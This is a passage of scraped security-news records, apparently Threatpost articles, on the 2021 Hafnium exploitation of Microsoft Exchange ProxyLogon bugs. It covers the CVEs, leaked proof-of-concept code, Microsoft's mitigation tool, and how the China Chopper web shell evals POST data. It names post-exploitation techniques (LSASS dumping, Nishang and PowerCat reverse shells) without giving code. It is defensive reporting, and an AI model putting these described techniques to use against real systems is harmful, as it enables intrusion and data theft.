[post](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog&utm_source=twitter&utm_medium=social&utm_content=exchange_landscape_blog_twitter>). \u201cIf you have an Exchange server unpatched and exposed to the internet, your organization is likely already breached. 
One reason the response may be so slow is many organizations may not realize they have exchange servers exposed to the Internet\u2014this is a common issue we see with new customers.\u201d\n\nIt added, \u201cAnother is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organizations to migrate to cloud email.\u201d\n\n## **Will the ProxyLogon Attacks Get Worse?**\n\nUnfortunately, it\u2019s likely that attacks on Exchange servers will become more voluminous. Last week, independent security researcher Nguyen Jang [published a PoC on GitHub, ](<https://twitter.com/taviso/status/1370068702817783810>)which chained two of the [ProxyLogon](<https://securityaffairs.co/wordpress/115428/security/microsoft-exchange-emergency-update.html>) vulnerabilities together.\n\nGitHub quickly took it down in light of the hundreds of thousands of still-vulnerable machines in use, but it was still available for several hours.\n\nThen over the weekend, another PoC appeared, flagged and confirmed by CERT/CC\u2019s Dormann:\n\n> Well, I'll say that the ProxyLogon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.<https://t.co/ubsysTeFOj> \nI'm not so sure about the \"Failed to write to shell\" error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. [pic.twitter.com/ijOGx3BIif](<https://t.co/ijOGx3BIif>)\n> \n> \u2014 Will Dormann (@wdormann) [March 13, 2021](<https://twitter.com/wdormann/status/1370800181143351296?ref_src=twsrc%5Etfw>)\n\nEarlier, Praetorian researchers on March 8 published a [detailed technical analysis](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>) of CVE-2021-26855 (the one used for initial access), which it used to create an exploit. 
The technical details offer a public roadmap for reverse-engineering the patch.\n\nThe original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft\u2019s information-sharing program, according to a recent report in the Wall Street Journal. [In light of evidence](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from one of its security partners.\n\nMAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures and indicators of compromise to their products and services. This can include, yes, exploit code.\n\n\u201cSome of the tools used in the second wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies and other security partners Feb. 23, investigators at security companies say,\u201d according to [the report](<https://www.wsj.com/articles/microsoft-probing-whether-leak-played-role-in-suspected-chinese-hack-11615575793>). \u201cMicrosoft had planned to release its security fixes two weeks later, on March 9, but after the second wave began it pushed out the patches a week early, on March 2, according to researchers.\u201d\n\n## **Microsoft Mitigation Tool**\n\nMicrosoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.\n\n\u201cMicrosoft has released a new, [one-click mitigation tool](<https://aka.ms/eomt>), Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. 
We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments,\u201d according to a [post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) published by Microsoft. \u201cThis new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d\n\nMicrosoft said that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, and will also scan the server using the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) to identify any existing compromises. Then, it will remediate those.\n\n## **China Chopper Back on the Workbench**\n\nAmid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.\n\nThat\u2019s according to [an analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/>) from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.\n\nChina Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. 
Once established, the backdoor \u2014 which [hasn\u2019t been altered much](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) since its inception nearly a decade ago \u2014 allows adversaries to execute various commands on the server, drop malware and more.\n\n\u201cWhile the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,\u201d according to Trustwave. \u201cThe China Chopper server-side ASPX web shell is [extremely small](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) and typically, the entire thing is just one line.\u201d\n\nHafnium is using the JScript version of the web shell, researchers added.\n\n\u201cThe script is essentially a page where when an HTTP POST request is made to the page, and the script will call the JScript \u2018eval\u2019 function to execute the string inside a given POST request variable,\u201d researchers explained. \u201cIn the\u2026script, the POST request variable is named \u2018secret,\u2019 meaning any JScript contained in the \u2018secret\u2019 variable will be executed on the server.\u201d\n\nResearchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker\u2019s systems.\n\n\u201cThis client allows the attacker to perform many nefarious tasks such as downloading and uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,\u201d explained Trustwave researchers. 
\u201cAll this is made available just from the one line of code running on the server.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:56:26", "type": "threatpost", "title": "Exchange Cyberattacks Escalate as Microsoft Rolls One-Click Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T16:56:26", "id": "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "href": "https://threatpost.com/microsoft-exchange-cyberattacks-one-click-fix/164817/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. 
The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched the following bugs this 
week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. 
\u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. 
\u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in